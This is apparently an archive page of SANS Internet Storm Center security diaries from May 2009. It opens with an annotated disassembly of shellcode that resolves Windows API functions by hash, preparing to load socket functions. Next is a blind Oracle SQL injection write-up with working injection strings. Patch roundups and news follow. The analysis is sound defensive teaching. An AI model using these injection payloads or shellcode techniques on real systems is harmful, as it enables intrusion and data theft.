Tempted as I am to go all "General Patton" on your cowardly ass, I will instead gently reassure you that we'll just take things one step at a time and work our way through this stuff together.  We may even hold hands.  So take a deep breath, let it out slowly-- put on your most comfortable set of shoes, pour yourself a wine spritzer, and we'll begin:

Remember from before, that good programming practice dictates that we save out the values in the registers that we're going to use, before we use them... so that we can put everything back in place when we're done.  That's what these four instructions are doing:

0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi

These match up nicely with four other instructions down near the end of the subroutine:

000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx

Remember, those ones at the end need to pop out the values that we pushed onto the stack in the opposite order... because it's a last-in-first-out (LIFO) stack.  Which, coincidentally, also is the reason for the meaning behind the next instruction:

00000592                 mov     ebp, [esp+arg_4]

Looking up at the top of the subroutine code, we can see that our disassembler has done something a little weird.  It's created some variables for us, called "arg_0" and "arg_4."  You see, the disassembler understands a couple of interesting things about how code is written, and it has taken that into account when it generated the disassembly in order to help us understand a little more about the code we're looking at.

Generally, programs tend to do small chunks of "stuff" over and over again.  Those chunks of "stuff" are organized by programmers into "functions" or "subroutines."  Functions take parameters (for instance, if you wrote a function to add two numbers, the parameters would be the two numbers to be added), and at the assembly language level, those parameters are passed on the stack. (Gosh, but this "stack" thing is useful, isn't it?)  Before we called this particular subroutine, we pushed some values onto the stack... since, at some point, the subroutine apparently uses those values (as we're about to see...) the disassembler then makes sure we understand what's going on by calling the two parameters (or arguments) to our attention, explicitly, at the top of the subroutine's disassembly.  The problem is this: the parameters are buried deep down in the stack... below the return location that gets pushed onto the stack when the subroutine is called, and even below the stuff that we just now pushed onto the stack-- so we're not gonna be able to just pop those suckers off and use 'em.  That's where these special offset variables up at the top of the subroutine come into play.   The disassembler understands what's going on, and does it's best to explain it to us by referencing these as "arg_0" and "arg_4" wherever they are used.  Unlike me, sometimes the disassembler will get things wrong... but for the most part (and especially in this case), it knows what it's talking about.

Now, remembering that the arguments are pushed onto a LIFO stack, we know that the deeper in the stack the variable is, the earlier it was pushed on... so "arg_4" corresponds to the BaseAddress of kernel32.dll that was pushed onto the stack with this statement:

0000047E                 push    dword ptr [esi]

So, based on the instructions at 0000592, EBP now contains the Base address of kernel32.dll. Then, we see the following:

00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp

so, EAX points to the BaseAddress of kernel32.dll (EBP) plus 60 (0x3C).  EDX then points to whatever is in *that* address added to the BaseAddress of kernel32.dll plus 120 (0x78).  Hmmm... let's see if we can figure out what that means.

We've been talking all along about the "BaseAddress" of kernel32.dll like that actually meant something... but what?  Well, when a dynamic link library (DLL) is loaded into the memory space of a program, what happens is that the full-blown .dll file itself is simply mapped directly into memory-- lock, stock, and barrel.  So, when we talk about the "BaseAddress" for the .dll, it is simply the beginning of that memory mapped file.  So, in order to understand what's going on here, we need to take a look at the format of a .dll file-- which is simply another vile and sinister incarnation of the more general "Portable Executable" (PE) file format used for most Windows executables.

Every PE file begins with an ode to the past... an old DOS header that hangs around to keep Windows backwards compatible.  (Yep, you can run Word 2007 in MS-DOS-- don't let anyone tell you differently. It won't really be all that interesting: it'll just tell you that you need to run it under Windows, but don't be fooled: it executed...) Now, deep down inside that old DOS header (called the "MZ" header... 'cause it begins with Mark Zbikowski's initials...) at position 0x3C is a 32-bit value known as "e_lfanew" that tells you the offset from the beginning of the file to the PE header itself.  In other words, that value tells you how many bytes of "backwards compatible" you need to skip to get to the real meat: the PE header. So what we're seeing so far makes sense: EAX is loaded up with the value of "e_lfanew" and added to the BaseAddress (that's then the beginning of the PE header).  Then, EDX is loaded up with a value at 0x78 within the PE header itself.  Let's see what's there...

Rolling down through the PE header to offset 0x78, we find that location occupied by a 32-bit value known as the "Export Table RVA."  When dealing with PE files, the idea of an "RVA" or "Relative Virtual Address" is used repeatedly.  Because PE files can't be guaranteed that they'll be loaded at the same memory location every time, most of the references to locations within the file are expressed as offsets from the BaseAddress-- a "Relative Virtual Address" or RVA.  And, in this case, we're seeing exactly why that's useful... it's going to make things a whole lot easier for us, because if we know anything at all, it's the BaseAddress of kernel32.dll.  In fact, in the very next instruction we see that we're updating EDX (by adding kernel32.dll's base address, found in EBP) so that it now points directly to the Export Table.

What the heck is an Export Table?  Well, remember that DLL files are simply libraries of interesting, reusable functions... code to perform exactly the kind of stuff that our malware (and legitimate programs) need to perform over and over.  But, for a DLL to be useful, it needs some way to tell other programs (programs that normally load the DLL at run-time) where, within itself, those interesting functions are found.  The Export Table is a structure that acts sort of like the card-catalog in a library (uh... do libraries actually even have card catalogs anymore, or did I just date myself?), allowing the Windows Loader to know where the functions that the DLL makes available are found, so it can then "fix up" the "Import Table" of the program loading the DLL-- which can then actually use the functions.  The Export Table itself has a specific, known structure, which we'll need to get on speaking terms with, because... well... the next three instructions look like this:

0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp

In this case, we see that we're copying the value found at offset 0x18 in the Export Table into ECX and the value found at offset 0x20 into EBX.  Since this appears to be somewhat important, in a vaguely "it causes the program to work" sorta way, we should probably try to find out what those values represent...

At offset 0x18 in the Export Table structure is a 32 bit value that represents the number of named functions exported by the DLL, and the value at 0x20 is an RVA for the beginning of a list of those names.  After the "add" instruction, EBX contains a the full address of that name list.

The next chunk of code:

000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld

starts off by checking the value in ECX: if it is zero, we end up jumping off someplace else that... well... we'll worry about later-- otherwise, the value in ECX is decremented by one.  Right off the bat, this gives us an idea of what is going on here: remember that ECX contained a count of the number of named functions that are exported by kernel32.dll... and so to me, it looks like we're going to step through each of those names looking for something... like some sort of modern-day, silicon-based Diogenes.

Because the names of the functions exported by kernel32.dll aren't all the same length, rather than store the names one after the other, which would require some fancy bookkeeping to keep track of name length, the list of function names is actually a list of RVA values that point to the beginning of each name.  The names themselves are terminated by a "zero," so keeping track of length is unnecessary.  Each RVA is four bytes long, and so this instruction:

000005AA                 mov     esi, [ebx+ecx*4]

is simply a way of calculating the location of the last RVA in the list and putting the result into ESI.  As we decrease the value of ECX, we'll move "down" through the list until ECX hits zero, where, it appears the loop will terminate.  The next two instructions clear out the value of EDI (remember how XOR works?) and then clears the "Direction" flag so that when the next chunk o' code begins rolling over the function name, it's for certain going to be moving in the correct direction. (Don't worry about it... just trust me, it's necessary.)

Now if that little excursion into the world of faith wasn't enough for you, the next few instructions will require you to take my word on even more stuff... 'cause explainin' how we get from one to the other would take us WAAAAY beyond the friendly confines of this little essay.  (I would never lie to you... about anything really, really important....) So, trust me... this stuff here:

000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2

is actually the assembly language equivalent of the C function:

unsigned long hash(char *function_name)
    unsigned long hash = 0;
    while (*function_name != 0) {
        hash = hash << (32 - 0x0D) | hash >> 0x0D;
        hash += *function_name++;
    return hash;

This function takes a function name (or really, any string) and then creates a hash value for that name.  "Wow," I hear you say, "it makes a hash value!  That's soooo cool... But what is a hash value?"  A hash value is the result of a function that simply takes a large chunk o' "source" data, and creates a sort of "digital fingerprint"-- a much shorter "hash" value that in some weird mathematical way "represents" the source.  Now because we're representing a large value using a much smaller value, there is no question that each of the resulting hashes will very likely map to more than one single "source" (something called a "hash collision") but for the purposes here, this is a quick and dirty way for our malware to find the function it wants to use, without ever having to actually have the name of the function stuffed somewhere in it's code.  Why is that important?  Well, first of all, it makes reverse engineering these things all that much more difficult, but it also makes it harder for an IDS to catch the code as it flies by.

Next, we see the following code:

000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7

This portion of the code begins by comparing the hash value that we just created against that funky number that was pushed onto the stack, as a parameter for this function... remember... 0x0EC0E4E8E...  If it doesn't match, we jump back up to the beginning of our loop, check to see if ECX is zero, decrement it, and check the next name-- lather, rinse, repeat.  If it does match, then we load up EBX with the value found at offset 0x24 of the Export Table (the address of which is still in EDX):

000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp

Offset 0x24 of the Export Table contains the RVA of the beginning of the OrdinalName list.  The "ordinal" of a function is simply its number (1, 2, 3, 4...) within the list of all functions exported by the DLL.  Every exported function has an ordinal-- but every function may not have a name-- some are only ever known by their ordinal. (Why? Because you can make your DLL smaller by forgoing names and using ordinals only... <sarcasm> and we all know that the Oompah Loompahs out in Redmond really care about bloat </sarcasm>... hell, they set the default file alignment on their linker to 4096 and routinely statically link the MSVC runtime in every executable... So, of course, they're gonna want to have a way to save a few bytes by jettisoning the damn function names... But, I digress...) Because of this, the actual location of the code must always be accessed through the ordinal list. The OrdinalName list contains the ordinal for each named exported function, in the same order that the names appear.  So... if you know where you are in the list o' names, you can simply look up the correct ordinal...  In the code above, we first load EBX with the OrdinalName list's RVA, and then add the BaseAddress of kernel32.dll to it.

000005CB                 mov     cx, [ebx+ecx*2]

Ordinals are only 2 bytes long, and since ECX contains the current "position" where we found our name on the name list, it's pretty straightforward to use that same number to get us our ordinal off of the OrdinalName list... which we conveniently load right back into ECX.

000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp

The FunctionAddress list itself is found at offset 0x1C in the Export Table.  For each exported function, the FunctionAddress list contains the RVA of the actual function's code... listed in ordinal order.  So we load the RVA of the beginning of the FunctionAddress list into EBX and add kernel32.dll's BaseAddress (in EBP).

000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD

At this point, ECX contains our ordinal, and each of the addresses in the FunctionAddress list is 4 bytes long... so the instructions above load the RVA of the function we're looking for into EAX and then add the BaseAddress of kernel32.dll.  We then jump to some code that cleans everything up and returns from our subroutine with the information we're looking for tucked away inside EAX.  If something goes south (i.e. we get through the whole list without finding a matching hash) then the subroutine will return with EAX zeroed out.

So, what function was represented by the magic hash value we passed in?  Here's a list of some of the hash values for kernel32.dll functions and also some additional code that shows some other functions being located:

Function Name             Hash
LoadLibraryA              0xEC0E4E8E
CreateProcessA            0x16B3FE72
ExitThread                0x60E0CEEF

0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E
0000048A                 mov     [esi+4], eax
0000048D                 push    dword ptr [esi]
0000048F                 push    16B3FE72h
00000494                 call    sub_58E
00000499                 mov     [esi+8], eax
0000049C                 push    dword ptr [esi]
0000049E                 push    60E0CEEFh
000004A3                 call    sub_58E
000004A8                 mov     [esi+0Ch], eax

Note that when each of the calls to the sub_58E subroutine returns, the stack is again, "messed up".  This is done on purpose to continue to open up more pseudo-bss space in which the malware stores the location of a specific kernel32.dll function.  Since ESI marks the beginning of the original "stack," that is used as the reference point for accessing the addresses of the functions.  At ESI+0x04, is the address of LoadLibraryA, at ESI+0x08 is the address of CreateProcessA, and at ESI+0x0C is the address of ExitThread.

Next, the malware puts one of these newly acquired functions to use:

000004AB                 push    3233h
000004B0                 push    5F327377h
000004B5                 push    esp
000004B6                 call    dword ptr [esi+4]
000004B9                 mov     [esi+10h], eax

All of that pushin' at the beginning of this section is actually shoving the name "ws2_32" onto the stack itself (Go and look at an ASCII chart... and remember stuff is backwards).  That final push of ESP is actually now acting as a pointer to the string sitting on the stack (ESP is a register that contains a pointer to the top of the stack... since our string is sitting on the stack-- we just pushed it on there, ESP acts to point at the string).  Finally, the malware again uses the fact that the stack is "messed up" to provide is a storage location for the BaseAddress of ws2_32.dll at esi+0x10 when we get back from the kernel32.dll code.

000004BC                 push    dword ptr [esi+10h]
000004BF                 push    0ADF509D9h
000004C4                 call    sub_58E
000004C9                 mov     [esi+14h], eax
000004CC                 push    dword ptr [esi+10h]
000004CF                 push    60AAF9ECh
000004D4                 call    sub_58E
000004D9                 mov     [esi+18h], eax
000004DC                 push    dword ptr [esi+10h]
000004DF                 push    79C679E7h
000004E4                 call    sub_58E
000004E9                 mov     [esi+1Ch], eax
000004EC                 push    dword ptr [esi+10h]
000004EF                 push    3BFCEDCBh
000004F4                 call    sub_58E
000004F9                 mov     [esi+20h], eax

Now, using the BaseAddress of the ws2_32.dll, the malware looks for hashes matching the following:

WSASocketA            0xADF509D9        (esi+0x14)
connect               0x60AAF9EC        (esi+0x18)
closesocket           0x79C679E7        (esi+0x1C)
WSAStartup            0x3BFCEDCB        (esi+0x20)

And stores each of them at the offsets from ESI listed above...

Ok... so, boys and girls, how was that for a wild ride?  Does your brain hurt yet?  Man, oh man... mine does! 

Well, we made it to the "kitchen," and we figured out how to find all of the tools necessary for our malware to make a sammich... In the next installment, we'll take a look at how that sammich gets made and what it actually does.

Tom Liston - InGuardians, Inc.
Handler On Duty
Chairman - SANS WhatWorks in Virtualization and Cloud Computing Security Summit
Follow me on Twitter


Published: 2009-05-19

Advanced blind SQL injection (with Oracle examples)

Quite often developers ask me if they should put controls about every single parameter that they receive from users of their web application. My answer is, of course, yes. Couple of weeks ago I worked on a penetration test where we exploited a blind SQL injection vulnerability in a web application that used Oracle as the backend database.

The vulnerability was not easy to exploit due to extensive use of stored procedures, but with some clever SQL hacking I managed to retrieve everything from the database. Since I haven't seen a lot of papers about this, I thought it's a good idea to do a diary about this so here we go.


First, we will define our test environment so you can see how to exploit it. In our test environment, the developer receives one parameter. We'll call it event and it can have two possible values, true or false. When called, it is used like this:


Now let's see how this can be exploited through some advanced SQL injection.

The simplest test is to enter a ' character in the parameter (event=true'). As we are dealing with SQL injection this will cause the SQL statement to be incorrect in which case the application will just print a message that a database error occurred (no SQL visible).

However, depending on the parameter (true or false or something else), the application will have different output and that allows us to see what's going on behind. In other words, if the parameter is "true" the output will be different from the case when the parameter is "abcd" (or "false"). And this is the basis of blind SQL injection – we want to make a difference between various SQL statements which will allow us to deduce the content of the database.

In typical blind SQL injection examples a timed delay is added to the attacker observes how long it takes for the query to execute. In this case it was not possible because I was dealing with stored procedures and some web application firewalls which prevented me from using UNION statements. But that doesn't mean it's game over.


As I don't know how exactly the stored procedure is called or what's the backend database, the easiest way to determine that is to split the input parameter:

event = tr' || 'ue

This will cause the final input parameter to be 'tr' || 'ue' – the || operator in Oracle means concatenate so the parameter will actually be "true".

This shows that the database is evaluating the SQL statement which allows us to enter some if/then cases that will, in the end, allow us to read data from the database. So let's see how this is done in a bit more complex query:

event = tr' || (select case when substr(banner, 1, 1) = 'A' then 'u' else 'X' end from (select banner from v$version where banner like '%Oracle%')) || 'e

While this maybe looks complex, it really isn't. The query takes the database banner from v$version (where it has string Oracle in it). Then, from that line the first character is examined (specified by the substr() call) and compared to the letter 'A'.
If it is 'A', the query returns 'u', otherwise it returns 'X'.

Finally, this is concatenated so we have the following if/then case:
- If first character of the banner line containing string Oracle is 'A' return 'u' so the final string will be 'true'.
- Otherwise, return 'X' so the final string will be 'trXe'.

Now, by examining the output of the application, I was able to deduce if the query was successful or not. Couple of minutes later, a perl script that traverses through all characters was done and I was able to retrieve data from the database.

Lessons learned

How serious is this? Well, it's pretty serious depending on what is in the database. While I wasn't able to modify the data, I was able to retrieve everything from the database. Remember Oracle? It has a handy table called all_sources which contains sources of stored procedures and functions. This allowed me even to retrieve source code!
This example shows why every parameter your application deals with must be verified. In this simple case, all the developer had to do is check if the parameter is true or false by creating a simple white list. Also, the developers should be aware that they can't rely on stored procedures (only), hoping that they will do the job for them as it all depends on the environment.




Published: 2009-05-19

New Version of Mandiant Highlighter

In the past I have waxed enthusiastically about Mandiant's Highlighter log parsing tool.  It is simply an amazing time saver for anyone who needs to parse fixed format log files such as firewall logs. The biggest limitation of the early versions of Highlighter was that it could not handle large files.  Not anymore...as of version 1.1.1 which was recently released, Highlighter now has large file support and a number of other new features.

Highlighter can be downloaded for free from the software section of Mandiant's website.

 More information on this release can be found at the Mandiant Blog.

-- Rick Wanner -  rwanner at isc dot sans dot org


Published: 2009-05-18

JSRedir-R/Gumblar badness

Reader Ben sent an email reminding me that I must have been living under a rock to miss the sudden uptick in Gumblar/JSRedir-R drive-bys.

Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar.  According to Sophos this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival.

Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials.

 More information is available at Sophos and the Unmask Parasites blog.


Update: Holger informed the ISC that the dropbox for this trojan, gumblar.cn has been offline since last friday, but  a successor has come online, martuz.cn. 

-- Rick Wanner -  rwanner at isc dot sans dot org


Published: 2009-05-18

Cisco SAFE Security Reference Guide Updated

A number of years ago I found myself in a new role responsible for consulting on the security of a VoIP platform.  Having never been responsible for VoIP security I went looking for Internet sources which I could use as a reference.  What I discovered was the Cisco SAFE security guides.  Although the SAFE VoIP security guide is long gone, the Cisco SAFE Security Reference Guide has recently been updated.  The Reference Guide is the omnibus document containing design standards for all aspects of network security.  Although Cisco-centric the Guide is a very complete and can be adapted to whatever technologies you choose to deploy in your networks.  In addition to the Reference Guide, the SAFE home page contains other papers which may be of use in interpreting SAFE.

-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-15

IIS6.0 WebDav Remote Auth Bypass

If you're in the security business long enough, this one will sound extremely familiar:  Apparently, adding certain Unicode characters to an URL makes it possible to bypass authentication in Microsoft IIS6 with WebDav and access or even upload files in folders which are supposed to be password protected.

The description was posted to Full Disclosure earlier, and there's a brief comment/analysis on Thierry Zoller's blog.

Yup, we hate to spring such surprises on you on a Friday evening.  If you have WebDav active and accessible from the Internet on any of your IIS6, it is probably a wise move to hedge and turn WebDav off over the weekend, until more details on this problem become available.



Published: 2009-05-15

Warranty void if seal shredded?

Fellow ISC handler Patrick Nolan commented earlier on the changes to HIPAA requirements that the recent HITECH act brings to hospitals and health care providers in the U.S. The portion that I want to dive into with a bit more detail is

"Electronic media [must be] cleared, purged, or destroyed consistent with NIST Special Publication 800-88, Guidelines for Media Sanitization such that [sensitive information cannot] be retrieved."

NIST 800-88  is pretty succinct and explicit in its demands on how media and harddisks are to be purged or destroyed. "Purging" refers to making the contents unreadable by "degaussing" the disk or using the "secure erase" command in the drive's firmware. "Destroying" in the words of NIST includes "Disintegration, Pulverization, Melting, and Incineration".

So far, so good. But there's a catch. Let's assume that you have a hard drive which contains sensitive data. It doesn't really matter if you are a bank or a hospital or a cutting-edge research shop: The data on the disk is vital. And the disk just snuffs it one day and refuses to spin. Let's further assume that - not uncommon for servers - the disk is still under warranty, and if you ship it back to your vendor, you'll get it replaced for free.

Now what? According to NIST 800-88, a disk with sensitive content which leaves your organization's control has to be destroyed. I strongly suspect though that shipping a baggie of metal confetti back to your vendor could slightly impair your warranty rights. Shipping the disk as-is, on the other hand, exposes your data to all sorts of nightmares, not the least of which being your vendor getting it back to spin and reselling it on eBay as "used, in working condition".

How do you deal with this problem? Do you shred all the disks that leave your shop, forgoing the warranty? Do you degauss the disks before returning, hoping that the degausser actually does its job and the vendor's check doesn't mind? Did you carefully vet your vendor's media handling and have full traceability for all disks returned? Or do you simply take the plunge and hope that your old disk vanishes in the sea of disks offered for resale?

Please let us know by participating in the poll to the right!



Published: 2009-05-14

Twitter for the Internet Storm Center

Even if you don't use Twitter, or could care less, you might want to read this post..

In light of what happened this morning, where we had 100's of Tweets going on during a major outage event. (Google being down) We don't want to force people who are following the http://twitter.com/sans_isc account to be subjected to news that you don't care about.

Therefore, the sans_isc account will only be used to display headlines and major announcements, (so feel free to have this account go to your cell phone via SMS if you wish).  If we need to go to a rapid-fire exchange, like what happened this morning, or in the event of a breaking news situation such as a new worm, virus, etc.  We've established a less formal account that we can tweet from very quickly.

This account will not be used as often, but when it does, be sure, it's something you might want to pay attention to.  The account is:


As the name implies, this is for the rapid fire dissemination of news and information, we are going to keep duplicate information between the two accounts to a minimum, and when we need to post something on the @sans_isc_fast account, we will call attention to it via the @sans_isc account.

We've put this on the official SANS handler Twitter list:


Thank you!

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-05-14

Possible Gmail outage

I am affected as well.  :)

We've received several reports in the past hour about Gmail being down.  Don't have a timeframe on how long it will be down, but it looks like Gmail has been unresponsive for about the past 10 minutes.  I'll update this diary if it continues.

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-05-12

Adobe Acrobat (reader) patches released

While patching your macs and windows machines on reboot Wednesday tomorrow, don't forget to patch adobe's acrobat (reader) just as well.

CVE-2009-1492 and CVE-2009-1493 are fixed.


Swa Frantzen -- Section 66


Published: 2009-05-12

Apple patches and updates

Apple released patches today:

  • Apple OS X 10.5.7 update  / Security update 2009-002

    10.5.7 is an update of the operating system (much like a service pack in the windows world) and contains functionality as well as security updates.

    The security content of this update is:

    • Apache: CVE-2008-2939, CVE-2008-0456
    • ATS: CVE-2009-0154
    • BIND (update to 9.3.6-P1 or 9.4.2-P1): CVE-2009-0025
    • CFNetwork: CVE-2009-0144, CVE-2009-0157
    • CoreGraphics: CVE-2009-0155, CVE-2009-0146, CVE-2009-0147, CVE-2009-0165
    • Cscope: CVE-2009-0148
    • CUPS: CVE-2009-0164
    • Disk Images: CVE-2009-0150, CVE-2009-0149
    • Enscript (update to 1.6.4): CVE-2004-1184, CVE-2004-1185, CVE-2004-1186, CVE-2008-3863
    • Flash Player plug-in (update to or CVE-2009-0519, CVE-2009-0520, CVE-2009-0114
    • Help Viewer: CVE-2009-0942, CVE-2009-0943
    • iChat: CVE-2009-0152
    • International Components for Unicode: CVE-2009-0153
    • IPSec:CVE-2008-3651, CVE-2008-3652
    • Kerberos: CVE-2009-0845, CVE-2009-0846, CVE-2009-0847, CVE-2009-0844
    • Kernel: CVE-2008-1517
    • Launch Services: CVE-2009-0156
    • libxml: CVE-2008-3529
    • Net-SNMP: CVE-2008-4309
    • Network Time: CVE-2009-0021, CVE-2009-0159
    • Networking: CVE-2008-3530
    • OpenSSL: CVE-2008-5077
    • PHP: CVE-2008-3659, CVE-2008-2829, CVE-2008-3660, CVE-2008-2666, CVE-2008-2371, CVE-2008-2665, CVE-2008-3658, CVE-2008-5557 (upgrade to 5.2.8)
    • QuickDraw Manager: CVE-2009-0160, CVE-2009-0010
    • Ruby (a.o. update to 1.8.6-p287): CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790, CVE-2009-0161
    • Safari: CVE-2009-0162
    • Spotlight: CVE-2009-0944
    • system_cmds
    • telnet: CVE-2009-0158
    • WebKit: CVE-2009-0945
    • X11 (a.o. updates to FreeType 2.3.8, libpng 1.2.35): CVE-2006-0747, CVE-2007-2754, CVE-2008-2383, CVE-2008-1382, CVE-2009-0040, CVE-2009-0946

    as always, this update is all or nothing, o no mixing and matching of what you need more urgently than other.

  • Safari 4 beta
    • libxml:  CVE-2008-3529
    • Safari:  CVE-2009-0162
    • WebKit:  CVE-2009-0945
  • Safari 3.2.3
    • libxml:  CVE-2008-3529
    • Safari:  CVE-2009-0162
    • WebKit:  CVE-2009-0945

Swa Frantzen -- Section 66



Published: 2009-05-12

MSFT's version of responsible disclosure

Microsoft is the one big company screaming loudest of all over "responsible disclosure".

They want an infinite amount to time to release their patches before those who found the problem are allowed to publish (but they can publish the second after Microsoft released the patch, all is fine for Microsoft (well, for their customer it's a bit of a different matter of course). Of course attackers couldn't care less about disclosure, and even some vulnerability researchers don't care for the credit line that Microsoft offers, nor the brand " irresponsible " it might earn them.

Still a policy typically cuts both ways: you need to obey the rules yourself just as well as all the others.

So let's have a look at MS09-017:

  • An unprecedented bunch of CVEs fixed.
  • Vulnerabilities in Office 2004 and 2008
  • Vulnerabilities in Works 8.5 and 9.0
  • No fixes for Office 2004, Office 2008, Works 8.5 nor Works 9.0

We all know from past experience the reverse engineering of patches back into exploits starts at the time -if not before- the patches are released. Typically it takes between hours and a day or so to complete this if it's easy to exploit (actually the new Microsoft rating of exploitability points out they are pretty easy).

So in the end Microsoft just released what hackers need to attack:

  • CVE-2009-0224 on Office 2004, Office 2008, XML convertor tools on mac, works 8.5 and works 9.0, as according to Microsoft themselves this CVE was not publicly known.
  • CVE-2009-0556 on Office 2004 (this one was publicly known and used), just the attack against the old software on mac might be news to some, still no patch available.
  • CVE-2009-1130 on Office 2004, as according to Microsoft themselves this vulnerability was not publicly known.

So what do you think of Microsoft and their "responsible" behavior in releasing MS09-017 as it was done?
You can use the poll ...

Swa Frantzen -- Section 66





Published: 2009-05-12

May Black Tuesday Overview

Overview of the May 2009 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS09-017 A multitude of vulnerabilities allow random code execution.
While Office for Mac versions and Works are affected by some of the vulnerabilities disclosed in the advisory, there are NO patches available from Microsoft at this time for these products.
Replaces MS08-051.

KB 967340

CVE-2009-0556 is actively exploited with exploit code publicly known since April 2nd 2009, see also SA969136

PATCH NOW Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

Swa Frantzen -- Section 66


Published: 2009-05-11

Sysinternals Updates 3 Applications

Sysinternals blog has announced three new updates.  Thanks to Roseman for the heads up!

Autoruns v9.5: This update to Autoruns, a powerful autostart manager, adds display of audio and video codecs, which are gaining popularity as an extension mechanism used by malware to gain automatic execution.

PsLoglist v2.7: This version of PsLoglist, a command-line event log display utility, now properly displays event log entries for default event log sources on Windows Vista and higher and accepts wildcard matching for event sources.

PsExec v1.95: This version of PsExec, a utility for executing applications remotely, fixes an issue that prevented the -i (interactive) switch from working on Windows XP systems with a recent hotfix and includes a number of minor bug fixes.

Mari Nichols


Published: 2009-05-10

Is your Symantec Antivirus Alerting working correctly?

 In the past several months multiple difficulties have arisen with Symantec AMS (Alert Management System).  The situation may sound familiar.  One minute the settings are configured correctly and alerting properly, the next thing you know, days have gone by without any detection.  This is great, right?  No viruses in our network!  Wrong… A careful inspection of the SAV console showed numerous detections without any alerts.  AMS doesn’t show alerting is configured.

Symantec informed the network technician that the AMS server needed to be reloaded.  This method was tried a few times each time services stopped again within days.  Finally a Symantec tech said that this was a “known issue”.  The workaround was to continue to reload the AMS services every time they stop working and take a chance we wouldn’t receive alerts or to use the alternative, the Reporting Server for alerting.

Days later on April 28, 2009, Symantec released four security vulnerabilities in SYM-09-007 involving some of the same Intel services that were involved in the issues experienced above.   At this point, it is unclear as to whether the vulnerabilities are related to the malfunctioning alerts, but it wouldn’t hurt to check your configurations.  The mitigations sound familiar.

The related services and vulnerabilities are described here and include the following:

1) Intel Common Base Agent Remote Command Execution Vulnerability

2) Intel Alert Originator Service Stack Overflow Vulnerability

3) Intel Alert Originator Service Buffer Overflow Vulnerabilities

4) Alert Management System Console Arbitrary Program Execution Design Error Vulnerability

Please take a few minutes to verify your version of SAV with this vulnerability announcement.  Then double check your alerting configurations. If anyone has any experience with the same issues, please let us know here.

Mari Nichols

PS:  Happy Mother's Day!  Don't forget to call your Mom.... :-)



Published: 2009-05-09

Shared SQL Injection Lessons Learned blog item

The X-Force Frequency Blog has a great read posted yeaterday by Harlan Carvey sharing some IR lessons learned, SQL Injection Lessons from X-Force Emergency Response Service Investigations.


Published: 2009-05-09

Unusable, Unreadable, or Indecipherable? No Breach reporting required

Recent HIPAA legislation promised guidance identifying "the Technologies and Methodologies That Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals for Purposes of the Breach Notification Requirements under Section 13402 of Title XIII (Health Information Technology for Economic and Clinical Health Act) of the American Recovery and Reinvestment Act of 2009" (ARRA). The guidance was issued (link below).

So if a covered entity loses the jewels and it's technoligies and methodologies are up to snuff, they do not have to report it.

At this point, the way TLS is referenced, it looks to me that the guidance points to TLS impacts on organizations and security vendors/service providers. YMMV.

There are a large number of high impact HIPAA changes written into ARRA, see;
The American Recovery and Reinvestment Act of 2009

The Guidance;
45 CFR PARTS 160 and 164
Guidance Specifying the Technologies and Methodologies That Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals for Purposes of the Breach Notification Requirements under Section 13402 of Title XIII (Health Information Technology for Economic and Clinical Health Act) of the American Recovery and Reinvestment Act of 2009


B. Guidance Specifying the Technologies and Methodologies that Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals

Protected health information (PHI) is rendered unusable, unreadable, or indecipherable to unauthorized individuals only if one or more of the following applies:

